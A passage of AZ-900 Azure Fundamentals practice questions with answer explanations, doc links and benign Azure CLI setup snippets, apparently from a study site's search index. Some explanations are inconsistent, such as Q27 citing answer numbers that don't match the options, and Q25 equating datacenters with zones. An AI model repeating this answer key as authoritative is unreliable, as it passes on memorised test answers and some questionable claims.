                            Explanation: The correct answer is a compatible VPN Gateway device. In order to establish a site-to-site VPN connection with Azure, a VPN Gateway is required on your company's internal network. A VPN Gateway is a specific type of virtual network gateway that sends encrypted traffic across a public network, like the Internet. While the name might suggest it's a purely virtual entity, in practice, the term \"VPN Gateway\" often refers to a hardware device that's installed on-premises in your data center. This device uses Internet Protocol security (IPsec) to establish a secure, encrypted connection to the Azure VPN Gateway, which resides in the Azure virtual network. This setup allows your local network and Azure to interact as if they're directly connected. In contrast, virtual machines, virtual networks, and application gateways are other types of Azure resources, but they do not facilitate creating a site-to-site VPN connection. It's important to note that your company's internal network hardware and settings must meet specific requirements to support a VPN Gateway. See:\u00a0https://docs.microsoft.com/en-us/azure/vpn-gateway/vpn-gateway-howto-site-to-site-resource-manager-portal
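
                            A rough sketch of the Azure-side setup (all names, addresses, and the shared key are placeholders); the on-premises VPN device is configured separately with matching settings:

                            ```bash
                            # Azure-side VPN gateway (provisioning can take 30+ minutes)
                            az network vnet-gateway create --resource-group my-rg --name my-vpn-gw \
                              --vnet my-vnet --public-ip-address my-vpn-gw-ip \
                              --gateway-type Vpn --vpn-type RouteBased --sku VpnGw1

                            # Object representing the on-premises VPN device and its address space
                            az network local-gateway create --resource-group my-rg --name onprem-gw \
                              --gateway-ip-address 203.0.113.10 --local-address-prefixes 10.10.0.0/16

                            # IPsec connection between the two, using a pre-shared key
                            az network vpn-connection create --resource-group my-rg --name s2s-conn \
                              --vnet-gateway1 my-vpn-gw --local-gateway2 onprem-gw \
                              --shared-key "REPLACE_WITH_PSK"
                            ```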

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-23-which-of-the-following-is-something-that-azure-cognitive-services-api-can-currently-do","title":"Question 23:\u00a0Which of the following is something that Azure Cognitive Services API can currently do?","text":"
                            • Translate text from one language to another
                            • All of these! Azure can do it all!
                            • Speak text in an extremely realistic way
                            • Create text from audio
                            • Recognize text in an image

                            Explanation: Azure can do all of them, of course. See:\u00a0https://docs.microsoft.com/en-us/azure/cognitive-services/welcome

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-24-which-of-the-following-azure-features-is-most-likely-to-deliver-the-most-immediate-savings-when-it-comes-to-reducing-azure-costs","title":"Question 24:\u00a0Which of the following Azure features is most likely to deliver the most immediate savings when it comes to reducing Azure costs?","text":"
                            • Changing your storage accounts from globally redundant (GRS) to locally redundant (LRS)
                            • Auto shutdown of development and QA servers over night and on weekends
                            • Using Azure Reserved Instances for most of your virtual machines
                            • Using Azure Policy to restrict the use of expensive VM SKUs

                            Explanation: Reserved Instances often offer savings of 40% or more off the price of pay-as-you-go virtual machines. See:\u00a0https://docs.microsoft.com/en-us/azure/cost-management-billing/reservations/save-compute-costs-reservations

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-25-in-the-context-of-azures-high-availability-solutions-what-is-the-primary-purpose-of-azure-availability-zones","title":"Question 25:\u00a0In the context of Azure's high availability solutions, what is the primary purpose of Azure Availability Zones?","text":"
                            • They serve as a folder structure in Azure used for organizing resources such as databases, virtual machines, and virtual networks.
                            • They are synonymous with an Azure region.
                            • They allow manual selection of data centers for virtual machine placement to achieve superior availability compared to other options.
                            • They represent certain server racks within individual data centers, specifically designed by Azure for higher uptime.

                            Explanation: The correct answer is: \"They allow manual selection of data centers for virtual machine placement to achieve superior availability compared to other options.\"

                            Azure Availability Zones are a high availability offering that protects applications and data from datacenter failures. Each Azure region is composed of multiple datacenters, and each datacenter is essentially an Availability Zone. They are unique physical locations within a region, equipped with their own independent power, cooling, and networking. By placing your resources across different Availability Zones within a region, you can protect your apps and data from the failure of a single datacenter. If one datacenter goes down, the resources in the other datacenters (Availability Zones) can continue to operate, providing redundancy and increasing the overall availability of your applications. It's important to note that these zones are not the same as Azure regions (which are geographical areas containing one or more datacenters), nor are they equivalent to resource groups (which are logical containers for resources deployed on Azure). They are also not isolated to specific racks within a datacenter, but rather spread across different datacenters in a region, offering a broader scope of protection. See:\u00a0https://docs.microsoft.com/en-us/azure/availability-zones/az-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-26-which-of-the-following-characteristics-is-essential-for-a-system-to-be-considered-highly-available-in-a-cloud-computing-environment","title":"Question 26:\u00a0Which of the following characteristics is essential for a system to be considered highly available in a cloud computing environment?","text":"
                            • The system must maintain 100% availability at all times.
                            • The system must be designed for resilience, with no single points of failure.
                            • It's impossible to create a highly available system.
                            • The system must operate on a minimum of two virtual machines.

                            Explanation: The correct answer is \"A system specifically designed to be resilient, with no single point of failures\". High availability in a system means that it is designed to operate continuously without failure for a long period of time. This is achieved by building redundancy into the system, eliminating single points of failure, and enabling rapid recovery from any failures that do occur. In other words, even if a component of the system fails, there are other components that can take over, allowing the system to continue operating seamlessly. While high availability often aims for close to 100% uptime, the claim of maintaining 100% availability is practically unrealistic due to factors like maintenance needs and unexpected failures. Also, having a minimum of two VMs may contribute to high availability but isn't a definitive requirement \u2014 it depends on the specifics of the system architecture. Finally, the assertion that it's not possible to create a highly available system is incorrect. There are established strategies and technologies for designing and operating highly available systems, and they are widely used in mission-critical applications across many industries. See:\u00a0https://docs.microsoft.com/en-us/azure/virtual-machines/windows/availability

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-27-in-the-context-of-cloud-computing-how-is-the-benefit-of-agility-best-described","title":"Question 27: In the context of cloud computing, how is the benefit of 'agility' best described?","text":"
                            • It refers to the ability to swiftly recover from a large-scale regional failure.
                            • It refers to the ability to quickly respond to and drive changes in the market.
                            • It refers to the system's ability to easily scale up when it reaches full capacity.
                            • It refers to the ability to rapidly provision new resources.

                            Explanation: The correct answer is \"It refers to the ability to quickly respond to and drive changes in the market\". Agility, in the context of cloud computing, refers to the ability of an organization to rapidly adapt to market and environmental changes in productive and cost-effective ways. It involves quickly adjusting and adapting strategic and operational capabilities to respond to and take advantage of changes in the business environment. The other options, while also benefits of the cloud, do not directly align with the concept of agility. Spinning up new resources quickly (Answer 2) or growing capacity easily when full (Answer 3) relate more to the cloud's scalability and elasticity. The ability to recover from a region-wide failure rapidly (Answer 4) speaks to the cloud's resilience and disaster recovery capabilities. While these aspects can contribute to overall business agility, they don't encapsulate the broader strategic meaning of agility - the capacity to quickly adjust to market changes, which can include shifts in customer demand, competitive pressures, or regulatory changes, among others. Hence, the ability to respond to and drive market change quickly is the most accurate answer. See:\u00a0https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/strategy/business-outcomes/agility-outcomes

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-28-if-you-wanted-to-simply-use-azure-as-an-extension-of-your-own-datacenter-not-primarily-hosting-anything-there-but-using-it-for-extra-storage-or-taking-advantage-of-some-services-what-hosting-model-is-that-called","title":"Question 28: If you wanted to simply use Azure as an extension of your own datacenter, not primarily hosting anything there but using it for extra storage or taking advantage of some services, what hosting model is that called?","text":"
                            • Public cloud
                            • Hybrid cloud
                            • Private cloud

                            Explanation: The correct answer is \"Hybrid cloud.\" The scenario described in the question is a typical use case for a hybrid cloud model, which integrates private cloud or on-premises infrastructure with public cloud resources, such as those provided by Azure. In a hybrid cloud model, businesses can keep sensitive data or critical applications on their private cloud or on-premises datacenter for security and compliance reasons while using the public cloud's vast resources for additional storage, computational power, or specific services when necessary. This not only allows for greater flexibility and scalability, but also offers potential cost savings. In contrast, a purely public cloud model involves hosting all data and applications on a public cloud provider's infrastructure, and a purely private cloud model involves hosting everything on a business's own infrastructure or a rented, single-tenant infrastructure. The described scenario of extending an on-premises datacenter with Azure services fits best with the hybrid cloud model. See:\u00a0https://azure.microsoft.com/en-us/overview/what-is-hybrid-cloud-computing/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-29-in-the-context-of-cloud-computing-a-virtual-machine-vm-is-primarily-associated-with-which-type-of-cloud-hosting-model","title":"Question 29: In the context of cloud computing, a virtual machine (VM) is primarily associated with which type of cloud hosting model?","text":"
                            • Software as a Service (SaaS)
                            • Infrastructure as a Service (IaaS)
                            • Platform as a Service (PaaS)

                            Explanation: The correct answer is IaaS, which stands for Infrastructure as a Service. In the context of cloud computing, a virtual machine (VM) is typically provided as part of an IaaS offering. With IaaS, the provider manages the underlying physical infrastructure (like servers, network equipment, and storage), while the consumer controls the virtualized components of the infrastructure, such as the virtual machines, their operating systems, and the applications running on them. This is contrasted with the other options. In a Platform as a Service (PaaS) model, the consumer only controls the applications and possibly some configuration settings for the application-hosting environment, but does not manage the operating system, server hardware, or network infrastructure. Similarly, in a Software as a Service (SaaS) model, the consumer only uses the software and does not control any aspect of the infrastructure or platform where the application runs. Therefore, given that a virtual machine involves control over the operating system and applications within a cloud-managed infrastructure, it aligns with the IaaS hosting model. See:\u00a0https://azure.microsoft.com/en-us/overview/what-is-iaas/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-30-which-of-the-following-best-describes-the-primary-benefit-of-a-content-delivery-network-cdn-in-a-cloud-computing-context","title":"Question 30:\u00a0Which of the following best describes the primary benefit of a Content Delivery Network (CDN) in a cloud computing context?","text":"
                            • For a nominal fee, Azure will manage your virtual machine, perform OS updates, and ensure optimal performance.
                            • It mitigates server load for static, unchanging files like images, videos, and PDFs by distributing them across a network of servers.
                            • It enables temporary session information storage for web visitors, such as their login ID or name.
                            • It provides fast and inexpensive data retrieval for later use.

                            Explanation: The correct answer, \"It mitigates server load for static, unchanging files\", is indeed the core benefit of a Content Delivery Network (CDN). A CDN stores copies of a website's static files on servers distributed globally. These static files could be anything that doesn't change frequently, like images, CSS, JavaScript, videos, etc. When a user visits the site, they are served these static files from the CDN server nearest to them geographically. This reduces the latency, as the data has a shorter distance to travel. Additionally, it reduces the load on the original server because the CDN handles a significant portion of the traffic. As a result, not only is the user experience improved due to faster load times, but the operational efficiency and performance of the original server are also enhanced. Therefore, CDNs are essential for sites serving large amounts of static content to a geographically dispersed user base. See:\u00a0https://docs.microsoft.com/en-us/azure/cdn/cdn-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-31-what-is-the-name-of-the-group-of-services-inside-azure-that-hosts-the-apache-hadoop-big-data-analysis-tools","title":"Question 31: What is the name of the group of services inside Azure that hosts the Apache Hadoop big data analysis tools?","text":"
                            • Azure Hadoop Services
                            • Azure Data Factory
                            • HDInsight
                            • Azure Kubernetes Services

                            Explanation: The correct answer is HDInsight. HDInsight is Microsoft Azure's offering for hosting the Apache Hadoop big data analysis tools. Apache Hadoop is an open-source software platform that supports data-intensive distributed applications. This platform enables processing large amounts of data across clusters of computers. Azure HDInsight is a cloud distribution of the Hadoop components from the Hortonworks Data Platform. It allows Azure users to process vast amounts of data with popular open-source frameworks such as Hadoop, Hive, HBase, Storm, and others. Additionally, the HDInsight service also supports R, Python, Scala, and .NET. So, it's not just limited to traditional Hadoop tools. Options like 'Azure Hadoop Services' and 'Azure Data Factory' are incorrect as Azure doesn't have a service named 'Azure Hadoop Services' and 'Azure Data Factory' is a cloud-based data integration service. 'Azure Kubernetes Services' is a service for managing containerized applications, not specifically for Hadoop. See:\u00a0https://azure.microsoft.com/en-us/services/hdinsight/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-32-within-the-landscape-of-cloud-service-models-how-would-microsofts-outlook-365-be-best-categorized","title":"Question 32: Within the landscape of cloud service models, how would Microsoft's Outlook 365 be best categorized?","text":"
                            • Infrastructure as a Service (IaaS)
                            • Software as a Service (SaaS)
                            • Platform as a Service (PaaS)

                            Explanation: The correct answer is SaaS, which stands for Software as a Service. Outlook 365, part of Microsoft's Office 365 suite, is a cloud-based service that provides access to various applications and services, including email, calendars, and contact management, which are delivered over the internet. In a SaaS model, the service provider is responsible for the infrastructure, platform, and software, and ensures their maintenance and updates. Users simply access the services via a web browser or app, without needing to worry about the underlying infrastructure, platform, or software updates. This contrasts with Infrastructure as a Service (IaaS), where the user is responsible for managing the operating systems, middleware, and applications, and Platform as a Service (PaaS), where the user manages only the applications and data. In both these models, the users have more responsibilities compared to SaaS. Since Outlook 365 is a software application delivered over the web with all underlying infrastructure and platform taken care of by Microsoft, it falls into the SaaS hosting model. See:\u00a0https://azure.microsoft.com/en-us/overview/what-is-saas/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-33-which-major-cloud-provider-offers-the-most-international-locations-for-customers-to-provision-virtual-machines-and-other-servers","title":"Question 33:\u00a0Which major cloud provider offers the most international locations for customers to provision virtual machines and other servers?","text":"
                            • Microsoft Azure
                            • Google Cloud Platform
                            • Amazon AWS

                            Explanation: Microsoft Azure offers the most extensive global coverage among major cloud providers in terms of geographical regions. This allows customers to provision virtual machines, databases, and other services in international locations closer to their user base, which can enhance performance, reduce latency, and help satisfy local data-residency regulations. While AWS (Amazon Web Services) and GCP (Google Cloud Platform) also provide many regions globally, Microsoft Azure has distinguished itself with the broadest regional availability. See:\u00a0https://azure.microsoft.com/en-us/global-infrastructure/regions/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-34-which-azure-website-tool-is-available-for-you-to-estimate-the-future-costs-of-your-azure-products-and-services-by-adding-products-to-a-shopping-basket-and-helping-you-calculate-the-costs","title":"Question 34:\u00a0Which Azure website tool is available for you to estimate the future costs of your Azure products and services by adding products to a shopping basket and helping you calculate the costs?","text":"
                            • Azure Pricing Calculator
                            • Microsoft Docs
                            • Azure Advisor

                            Explanation: The Azure Pricing Calculator lets you estimate your future bill based on the resources you select and your estimates of usage. See:\u00a0https://azure.microsoft.com/en-us/pricing/calculator/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-35-what-is-the-name-of-azures-hosted-sql-database-service","title":"Question 35:\u00a0What is the name of Azure's hosted SQL database service?","text":"
                            • SQL Server in a VM
                            • Table Storage
                            • Cosmos DB
                            • Azure SQL Database

                            Explanation: Azure SQL Database is a SQL Server-compatible option in Azure, offered as a database as a service. See:\u00a0https://docs.microsoft.com/en-us/azure/sql-database/sql-database-technical-overview
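
                            A minimal provisioning sketch (the server name must be globally unique; all values here are placeholders):

                            ```bash
                            # Logical SQL server, then a database hosted on it
                            az sql server create --resource-group my-rg --name my-sql-server-12345 \
                              --location westeurope --admin-user sqladmin --admin-password "REPLACE_ME"

                            az sql db create --resource-group my-rg --server my-sql-server-12345 \
                              --name mydb --service-objective S0
                            ```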

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-36-true-or-false-you-cannot-have-more-than-one-azure-subscription-per-company","title":"Question 36:\u00a0True or false: You cannot have more than one Azure subscription per company","text":"
                            • TRUE
                            • FALSE

                            Explanation: You can have multiple subscriptions, as a way to separate out resources between billing units, business groups, or for any reason you wish. See:\u00a0https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/decision-guides/subscriptions/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-37-can-you-give-someone-else-access-to-your-azure-subscription-without-giving-them-your-user-name-and-password","title":"Question 37:\u00a0Can you give someone else access to your Azure subscription without giving them your user name and password?","text":"
                            • YES
                            • NO

                            Explanation: Yes. Anyone can create their own Azure account, and you can give them access to your subscription with granular control over permissions. See:\u00a0https://docs.microsoft.com/en-us/azure/role-based-access-control/overview
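
                            For example (the user and subscription ID are placeholders), access can be granted without ever sharing credentials:

                            ```bash
                            # Grant read-only access to the whole subscription
                            az role assignment create \
                              --assignee "colleague@contoso.com" \
                              --role "Reader" \
                              --scope "/subscriptions/00000000-0000-0000-0000-000000000000"
                            ```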

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-38-true-or-false-you-can-create-your-own-policies-if-built-in-azure-policy-is-not-sufficient-to-your-needs","title":"Question 38:\u00a0True or false: you can create your own policies if built-in Azure Policy is not sufficient to your needs","text":"
                            • FALSE
                            • TRUE

                            Explanation: True, you can create custom policies using JSON. See:\u00a0https://docs.microsoft.com/en-us/azure/governance/policy/tutorials/create-custom-policy-definition
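
                            A minimal sketch of a custom definition (the rule below, denying creation of public IP addresses, is only an illustrative example):

                            ```bash
                            # Policy rule: deny creation of public IP addresses
                            cat > rules.json <<'EOF'
                            {
                              "if": {
                                "field": "type",
                                "equals": "Microsoft.Network/publicIPAddresses"
                              },
                              "then": { "effect": "deny" }
                            }
                            EOF

                            az policy definition create --name deny-public-ip \
                              --display-name "Deny public IP addresses" \
                              --rules rules.json --mode All
                            ```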

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-39-in-the-context-of-azures-service-level-agreement-sla-for-virtual-machines-which-of-the-following-deployment-strategies-would-offer-the-highest-level-of-availability","title":"Question 39:\u00a0In the context of Azure's Service Level Agreement (SLA) for virtual machines, which of the following deployment strategies would offer the highest level of availability?","text":"
                            • Deploying two or more virtual machines across different availability zones within the same region.
                            • Deploying two or more virtual machines within the same data center.
                            • Deploying two or more virtual machines within an availability set.
                            • Deploying a single virtual machine.

                            Explanation: The correct answer is \"Deploying two or more virtual machines across different availability zones within the same region\".

                            Service Level Agreement (SLA) is a commitment by a service provider on the level of service - like uptime, performance, or other key metrics - that users can expect. Azure provides an SLA for various services, including Virtual Machines. A single VM, even with premium storage, provides a lesser SLA compared to VMs deployed in an Availability Set or across Availability Zones. While using an Availability Set (two or more VMs in the same datacenter but across fault and update domains) provides a higher SLA than a single VM, the highest SLA is provided when two or more VMs are deployed across Availability Zones in the same region. Availability Zones are unique physical locations within a region. Each zone is made up of one or more datacenters equipped with independent power, cooling, and networking. They are set up to be an isolation boundary - if one zone goes down, the other continues working. This distribution of VMs across zones provides high availability and resiliency, hence offering the highest SLA. See:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/virtual-machines/v1_9/
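
                            As a sketch (names and image alias are placeholders), the zone is chosen per VM at creation time:

                            ```bash
                            # Two VMs in the same region but in different availability zones
                            az vm create --resource-group my-rg --name web-1 --image Ubuntu2204 \
                              --zone 1 --admin-username azureuser --generate-ssh-keys
                            az vm create --resource-group my-rg --name web-2 --image Ubuntu2204 \
                              --zone 2 --admin-username azureuser --generate-ssh-keys
                            ```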

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-40-what-is-the-basic-way-of-protecting-an-azure-virtual-network-subnet","title":"Question 40: What is the basic way of protecting an Azure Virtual Network subnet?","text":"
                            • Network Security Group
                            • Azure DDoS Standard protection
                            • Azure Firewall
                            • Application Gateway with WAF

                            Explanation: Network Security Group (NSG) - a fairly basic set of rules that you can apply to both inbound and outbound traffic, letting you specify which sources, destinations, and ports are allowed to travel into and out of the virtual network. See:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/security-overview
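
                            A brief sketch (names and the port are placeholders): create an NSG, allow one inbound port, and attach the NSG to a subnet:

                            ```bash
                            az network nsg create --resource-group my-rg --name web-nsg

                            # Allow inbound HTTPS; other inbound traffic stays blocked by default rules
                            az network nsg rule create --resource-group my-rg --nsg-name web-nsg \
                              --name AllowHTTPS --priority 100 --direction Inbound --access Allow \
                              --protocol Tcp --destination-port-ranges 443

                            # Associate the NSG with a subnet of an existing virtual network
                            az network vnet subnet update --resource-group my-rg --vnet-name my-vnet \
                              --name web-subnet --network-security-group web-nsg
                            ```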

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-41-true-or-false-formal-support-is-not-included-in-private-preview-mode","title":"Question 41:\u00a0True or false: Formal support is not included in private preview mode.","text":"
                            • FALSE
                            • TRUE

                            Explanation: True. Preview features are not fully ready and this phase does not include formal support. See:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-42-true-or-false-azure-has-the-responsibility-to-manage-the-hardware-in-the-infrastructure-as-a-service-model","title":"Question 42:\u00a0True or False: Azure has the responsibility to manage the hardware in the Infrastructure as a Service model","text":"
                            • TRUE
                            • FALSE

                            Explanation: The correct answer is TRUE. In an Infrastructure as a Service (IaaS) model, the cloud service provider, in this case Microsoft Azure, is responsible for managing the underlying physical hardware. This includes servers, storage, networking hardware, and the virtualization layer. Azure ensures that these resources are available and maintained, providing capabilities like automated backup, disaster recovery, and scaling. The customer, on the other hand, is responsible for managing the software components of the service, including the operating system, middleware, runtime, data, and applications. This arrangement allows customers to focus on their core business and application development without worrying about the physical infrastructure's procurement, management, and maintenance. It's important to remember that the division of responsibilities may change in other service models like Platform as a Service (PaaS) or Software as a Service (SaaS), where the cloud service provider manages more layers of the technology stack. But for IaaS, the provider indeed manages the hardware, making the statement TRUE. See:\u00a0https://azure.microsoft.com/en-us/overview/what-is-iaas/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-43-what-is-single-sign-on","title":"Question 43: What is Single Sign-On?","text":"
                            • When you sign in to an application, it remembers who you are the next time you go there.
                            • The ability to use an existing user id and password to sign in other applications, and not have to create/memorize a new one.
                            • When an application outsources (federates) its identity service to a third-party platform

                            Explanation: Single Sign-On - the ability to use the same user id and password to log into every application that your company has; enabled by Azure AD. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/what-is-single-sign-on

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-44-an-it-administrator-has-the-requirement-to-control-access-to-a-specific-app-resource-using-multi-factor-authentication-what-azure-service-satisfies-this-requirement","title":"Question 44:\u00a0An IT administrator has the requirement to control access to a specific app resource using multi-factor authentication. What Azure service satisfies this requirement?","text":"
                            • Azure Authentication
                            • Azure Function
                            • Azure AD
                            • Azure Authorization

                            Explanation: You can use Azure AD to control access to your apps and your app resources, based on your business requirements. In addition, you can use Azure AD to require multi-factor authentication when accessing important organizational resources. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis#which-features-work-in-azure-ad

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-45-what-is-the-main-management-tool-used-for-managing-azure-resources-with-a-graphical-user-interface","title":"Question 45:\u00a0What is the MAIN management tool used for managing Azure resources with a graphical user interface?","text":"
                            • Remote Desktop Protocol (RDP)
                            • PowerShell
                            • Azure Storage Explorer
                            • Azure Portal

                            Explanation: Azure Portal is the website used to manage your resources in Azure. See:\u00a0https://docs.microsoft.com/en-us/azure/azure-portal/azure-portal-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-46-what-is-the-default-amount-of-credits-that-you-are-given-when-you-first-create-an-azure-free-account","title":"Question 46:\u00a0What is the default amount of credits that you are given when you first create an Azure Free account?","text":"
                            • The default is US$200
                            • You can create 1 Linux VM, 1 Windows VM, and a number of other free services for the first year.
                            • You are given $50 per month, for one year towards Azure services
                            • Azure does not give you any free credits when you create a free account

                            Explanation: There are some other benefits to a free account, but you get US$200 to spend in the first month. See:\u00a0https://azure.microsoft.com/free

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-47-azure-services-can-go-through-several-phases-in-a-service-lifecycle-what-are-the-three-phases-called","title":"Question 47:\u00a0Azure Services can go through several phases in a Service Lifecycle. What are the three phases called?","text":"
                            • Preview Phase, General Availability Phase, and Unpublished
                            • Private Preview, Public Preview, and General Availability
                            • Development phase, QA phase, and Live phase
                            • Announced, Coming Soon, and Live

                            Explanation: Private Preview, Public Preview, and General Availability.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-48-what-is-azures-preferred-identityauthentication-service","title":"Question 48:\u00a0What is Azure's preferred Identity/authentication service?","text":"
                            • Network Security Group
                            • Facebook Connect
                            • Live Connect
                            • Azure Active Directory

                            Explanation: Azure Active Directory (Azure AD) - Microsoft\u2019s preferred Identity as a Service solution. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-49-which-tool-within-azure-helps-you-to-track-your-compliance-with-various-international-standards-and-government-laws","title":"Question 49:\u00a0Which tool within Azure helps you to track your compliance with various international standards and government laws?","text":"
                            • Microsoft Privacy Statement
                            • Service Trust Portal
                            • Compliance Manager
                            • Azure Government Services

                            Explanation: Compliance Manager will track your own compliance with various standards and laws. See:\u00a0https://techcommunity.microsoft.com/t5/security-privacy-and-compliance/announcing-compliance-manager-general-availability/ba-p/161922

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-50-which-of-the-following-is-a-feature-of-the-cool-access-tier-for-azure-storage","title":"Question 50:\u00a0Which of the following is a feature of the cool access tier for Azure Storage?","text":"
                            • Much cheaper to store your files than the hot access tier
                            • Most expensive option when it comes to bandwidth cost to access your files
                            • Cheapest option when it comes to bandwidth costs to access your files
                            • Significant delays in accessing your data, up to several hours

                            Explanation: Cool access tier offers cost savings when you expect to store your files and not need to access them often. See:\u00a0https://docs.microsoft.com/en-us/azure/storage/blobs/storage-blob-storage-tiers?tabs=azure-portal

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#test-2","title":"Test 2","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-1-which-of-the-following-scenarios-would-azure-policy-be-a-recommended-method-for-enforcement","title":"Question 1: Which of the following scenarios would Azure Policy be a recommended method for enforcement?","text":"
                            • Allow only one specific role of users to have access to a resource group
                            • Add an additional prompt when creating a resource without a specific tag to ask the user if they are really sure they want to continue
                            • Prevent certain Azure Virtual Machine instance types from being used in a resource group
                            • Require a virtual machine to always update to the latest security patches

                            Explanation: Azure Policy can add restrictions on storage account SKUs, virtual machine instance types, and rules relating to tagging of resources and groups. It cannot prompt a user to ask them if they are sure. For more info:\u00a0https://docs.microsoft.com/en-us/azure/governance/policy/overview

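                            A rough illustration of that third scenario: an Azure Policy definition is a JSON rule that Azure evaluates on every deployment. A minimal sketch via the Azure CLI, assuming a hypothetical rules file and resource group (all names are placeholders; the field alias follows the built-in "allowed VM size SKUs" policy):

                            # deny-vm-sizes.json (hypothetical): deny any VM whose size is not in the allowed list
                            # {
                            #   "if": { "allOf": [
                            #     { "field": "type", "equals": "Microsoft.Compute/virtualMachines" },
                            #     { "not": { "field": "Microsoft.Compute/virtualMachines/sku.name",
                            #                "in": [ "Standard_B1s", "Standard_B2s" ] } } ] },
                            #   "then": { "effect": "deny" }
                            # }
                            az policy definition create --name restrict-vm-sizes --mode All --rules deny-vm-sizes.json
                            az policy assignment create --policy restrict-vm-sizes --resource-group demo-rg
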
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-2-select-the-ways-to-increase-the-security-of-a-traditional-user-id-and-password-system","title":"Question 2:\u00a0Select the way(s) to increase the security of a traditional user id and password system?","text":"
                            • Use multi-factor authentication which requires an additional device (something you have) to verify identity.
                            • Require longer and more complex passwords.
                            • Do not allow users to log into an application except using a company registered device.
                            • Require users to change their passwords more frequently.

                            Explanation: All of these are ways to increase the security of an account. For more info: - https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-password-ban-bad - https://docs.microsoft.com/en-us/azure/active-directory-domain-services/password-policy - https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-sspr-policy

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-3-besides-azure-service-health-where-else-can-you-find-out-any-issues-that-affect-the-azure-global-network-that-affect-you","title":"Question 3:\u00a0Besides Azure Service Health, where else can you find out any issues that affect the Azure global network that affect you?","text":"
                            • Install the Azure app on your phone
                            • Azure will email you
                            • Azure Updates Blog
                            • Each Virtual Machine has a Resource Health blade

                            Explanation: Each Virtual Machine has a Resource Health blade. For more info:\u00a0https://docs.microsoft.com/en-us/azure/service-health/resource-health-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-4-what-would-be-a-good-reason-to-have-multiple-azure-subscriptions","title":"Question 4:\u00a0What would be a good reason to have multiple Azure subscriptions?","text":"
                            • There is one person/credit card paying for resources, and only one person who logs into Azure to manage the resources, but you want to be able to know which resources are used for which client project.
                            • There is one person/credit card paying for resources, but many people who have accounts in Azure, and you need to separate out resources between clients so that there is absolutely no chance of resources being exposed between them.

                            Explanation: Having multiple subscriptions can technically be done for any reason, but it only makes sense if you have to separate billing directly, or have actual clients logging into the Portal to manage their resources. For more info:\u00a0https://docs.microsoft.com/en-us/microsoft-365/enterprise/subscriptions-licenses-accounts-and-tenants-for-microsoft-cloud-offerings?view=o365-worldwide

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-5-which-of-the-following-is-not-an-example-of-infrastructure-as-a-service","title":"Question 5:\u00a0Which of the following is not an example of Infrastructure as a Service?","text":"
                            • Azure SQL Database
                            • SQL Server in a VM
                            • Virtual Machine
                            • Virtual Machine Scale Sets
                            • Virtual Network

                            Explanation: With Azure SQL Database, the infrastructure is not in your control. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-sql/azure-sql-iaas-vs-paas-what-is-overview

